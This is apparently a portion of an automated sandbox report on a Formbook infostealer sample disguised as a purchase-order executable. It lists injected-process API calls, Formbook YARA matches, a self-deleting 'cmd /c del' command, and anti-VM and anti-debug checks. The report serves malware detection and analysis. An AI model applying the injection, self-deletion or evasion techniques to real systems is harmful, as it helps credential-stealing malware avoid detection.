Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F995D0 NtClose,LdrInitializeThunk,14_2_04F995D0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99540 NtReadFile,LdrInitializeThunk,14_2_04F99540
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F996E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04F996E0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F996D0 NtCreateKey,LdrInitializeThunk,14_2_04F996D0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04F99660
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99650 NtQueryValueKey,LdrInitializeThunk,14_2_04F99650
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99FE0 NtCreateMutant,LdrInitializeThunk,14_2_04F99FE0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99780 NtMapViewOfSection,LdrInitializeThunk,14_2_04F99780
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99710 NtQueryInformationToken,LdrInitializeThunk,14_2_04F99710
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99860 NtQuerySystemInformation,LdrInitializeThunk,14_2_04F99860
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99840 NtDelayExecution,LdrInitializeThunk,14_2_04F99840
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F999A0 NtCreateSection,LdrInitializeThunk,14_2_04F999A0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04F99910
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99A50 NtCreateFile,LdrInitializeThunk,14_2_04F99A50
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F995F0 NtQueryInformationFile,14_2_04F995F0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99560 NtWriteFile,14_2_04F99560
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F9AD30 NtSetContextThread,14_2_04F9AD30
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99520 NtWaitForSingleObject,14_2_04F99520
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04F99670 NtQueryInformationProcess,14_2_04F99670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99610 NtEnumerateValueKey,14_2_04F99610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F997A0 NtUnmapViewOfSection,14_2_04F997A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F9A770 NtOpenThread,14_2_04F9A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99770 NtSetInformationFile,14_2_04F99770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99760 NtOpenProcess,14_2_04F99760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99730 NtQueryVirtualMemory,14_2_04F99730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F9A710 NtOpenProcessToken,14_2_04F9A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F998F0 NtReadVirtualMemory,14_2_04F998F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F998A0 NtWriteVirtualMemory,14_2_04F998A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F9B040 NtSuspendThread,14_2_04F9B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99820 NtEnumerateKey,14_2_04F99820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F999D0 NtCreateProcessEx,14_2_04F999D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99950 NtQueueApcThread,14_2_04F99950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99A80 NtOpenDirectoryObject,14_2_04F99A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99A20 NtResumeThread,14_2_04F99A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99A10 NtQuerySection,14_2_04F99A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99A00 NtProtectVirtualMemory,14_2_04F99A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F9A3B0 NtGetContextThread,14_2_04F9A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99B00 NtSetValueKey,14_2_04F99B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067B90 NtCreateFile,14_2_03067B90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067D70 NtAllocateVirtualMemory,14_2_03067D70
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067C40 NtReadFile,14_2_03067C40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067CC0 NtClose,14_2_03067CC0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067B8B NtCreateFile,14_2_03067B8B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067D6C NtAllocateVirtualMemory,14_2_03067D6C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067CBA NtReadFile,14_2_03067CBA
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: String function: 0085DF39 appears 54 times
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: String function: 00852CB0 appears 90 times
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: String function: 012EB150 appears 139 times
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04F5B150 appears 136 times
          Source: PO8479349743085.exe, 00000000.00000003.258727966.0000000003136000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO8479349743085.exe
          Source: PO8479349743085.exe, 00000004.00000002.303837549.00000000013DF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO8479349743085.exe
          Source: PO8479349743085.exe, 00000004.00000002.304287369.0000000002F33000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamecolorcpl.exej% vs PO8479349743085.exe
          Source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/0@15/5
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
          Source: PO8479349743085.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: PO8479349743085.exe | ReversingLabs: Detection: 14%
          Source: C:\Users\user\Desktop\PO8479349743085.exe | File read: C:\Users\user\Desktop\PO8479349743085.exe
          Source: unknown | Process created: C:\Users\user\Desktop\PO8479349743085.exe 'C:\Users\user\Desktop\PO8479349743085.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Users\user\Desktop\PO8479349743085.exe C:\Users\user\Desktop\PO8479349743085.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO8479349743085.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Process created: C:\Users\user\Desktop\PO8479349743085.exe C:\Users\user\Desktop\PO8479349743085.exe
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO8479349743085.exe'
          Source: PO8479349743085.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: PO8479349743085.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: PO8479349743085.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: PO8479349743085.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: PO8479349743085.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: PO8479349743085.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: PO8479349743085.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: PO8479349743085.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: colorcpl.pdbGCTL source: PO8479349743085.exe, 00000004.00000002.304278393.0000000002F30000.00000040.00000001.sdmp
          Source: Binary string: colorcpl.pdb source: PO8479349743085.exe, 00000004.00000002.304278393.0000000002F30000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.290155438.000000000E320000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO8479349743085.exe, 00000000.00000003.255725673.0000000003180000.00000004.00000001.sdmp, PO8479349743085.exe, 00000004.00000002.303837549.00000000013DF000.00000040.00000001.sdmp, colorcpl.exe, 0000000E.00000002.484803195.000000000504F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO8479349743085.exe, colorcpl.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.290155438.000000000E320000.00000002.00000001.sdmp
          Source: PO8479349743085.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: PO8479349743085.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: PO8479349743085.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: PO8479349743085.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: PO8479349743085.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: PO8479349743085.exe | Static PE information: real checksum: 0x3096b should be: 0x5b4e0
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 0_2_00852CF6 push ecx; ret 0_2_00852D09
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0041C184 push dword ptr [2E33947Ah]; ret 4_2_0041C174
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0041C2FA push ecx; ret 4_2_0041C2FF
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0041C288 push CCFB6AF2h; ret 4_2_0041C2AB
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_004192B5 push eax; iretd 4_2_004192BF
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_00414CED push ecx; ret 4_2_00414CEE
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0041AD55 push eax; ret 4_2_0041ADA8
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0041ADA2 push eax; ret 4_2_0041ADA8
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0041ADAB push eax; ret 4_2_0041AE12
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_00414E09 pushfd ; ret 4_2_00414E39
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0041AE0C push eax; ret 4_2_0041AE12
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0041BF14 push dword ptr [2E33947Ah]; ret 4_2_0041C174
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_00852CF6 push ecx; ret 4_2_00852D09
          Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0133D0D1 push ecx; ret 4_2_0133D0E4
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04FAD0D1 push ecx; ret 14_2_04FAD0E4
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0306C288 push CCFB6AF2h; ret 14_2_0306C2AB
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_030692B5 push eax; iretd 14_2_030692BF
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0306C2FA push ecx; ret 14_2_0306C2FF
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0306C184 push dword ptr [2E33947Ah]; ret 14_2_0306C174
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0306C8CA push cs; ret 14_2_0306C8D1
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0306BF14 push dword ptr [2E33947Ah]; ret 14_2_0306C174
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0306AE0C push eax; ret 14_2_0306AE12
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_03064E09 pushfd ; ret 14_2_03064E39
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0306AD55 push eax; ret 14_2_0306ADA8
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0306ADA2 push eax; ret 14_2_0306ADA8
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0306ADAB push eax; ret 14_2_0306AE12
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_03064CED push ecx; ret 14_2_03064CEE
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\PO8479349743085.exe RDTSC instruction interceptor: First address: 00000000004083C4 second address: 00000000004083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO8479349743085.exe RDTSC instruction interceptor: First address: 000000000040875E second address: 0000000000408764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 00000000030583C4 second address: 00000000030583CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 000000000305875E second address: 0000000003058764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_00408690 rdtsc 4_2_00408690
          Source: C:\Windows\explorer.exe TID: 6904 Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4144 Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 0_2_00862535 FindFirstFileExW,0_2_00862535
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_00862535 FindFirstFileExW,4_2_00862535
          Source: explorer.exe, 00000007.00000000.285531454.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000007.00000000.285531454.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000007.00000000.284472922.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000007.00000000.285180147.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000002.493962108.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000007.00000000.285531454.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000007.00000000.285531454.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000007.00000000.285928062.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000007.00000000.277377565.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000007.00000000.284472922.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000000.284472922.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000007.00000000.284472922.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO8479349743085.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO8479349743085.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_00408690 rdtsc 4_2_00408690
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_004098F0 LdrLoadDll,4_2_004098F0
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 0_2_0085D0B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0085D0B2
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 0_2_00851B90 mov eax, dword ptr fs:[00000030h] 0_2_00851B90
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 0_2_00851B90 mov eax, dword ptr fs:[00000030h] 0_2_00851B90
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 0_2_008611AF mov eax, dword ptr fs:[00000030h] 0_2_008611AF
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 0_2_00876323 mov eax, dword ptr fs:[00000030h] 0_2_00876323
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 0_2_00876C94 mov eax, dword ptr fs:[00000030h] 0_2_00876C94
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 0_2_00876CCF mov eax, dword ptr fs:[00000030h] 0_2_00876CCF
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 0_2_00876D32 mov eax, dword ptr fs:[00000030h] 0_2_00876D32
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 0_2_0085AF0B mov eax, dword ptr fs:[00000030h] 0_2_0085AF0B
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_008611AF mov eax, dword ptr fs:[00000030h] 4_2_008611AF
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_00851B90 mov eax, dword ptr fs:[00000030h] 4_2_00851B90
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_00851B90 mov eax, dword ptr fs:[00000030h] 4_2_00851B90
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_0085AF0B mov eax, dword ptr fs:[00000030h] 4_2_0085AF0B
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_0131513A mov eax, dword ptr fs:[00000030h] 4_2_0131513A
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_0131513A mov eax, dword ptr fs:[00000030h] 4_2_0131513A
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_01304120 mov eax, dword ptr fs:[00000030h] 4_2_01304120
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_01304120 mov eax, dword ptr fs:[00000030h] 4_2_01304120
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_01304120 mov eax, dword ptr fs:[00000030h] 4_2_01304120
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_01304120 mov eax, dword ptr fs:[00000030h] 4_2_01304120
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_01304120 mov ecx, dword ptr fs:[00000030h] 4_2_01304120
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_012E9100 mov eax, dword ptr fs:[00000030h] 4_2_012E9100
          Source: C:\Users\user\Desktop\PO8479349743085.exe Code function: 4_2_012E9100 mov eax, dword ptr fs:[00000030h] 4_2_012E9100
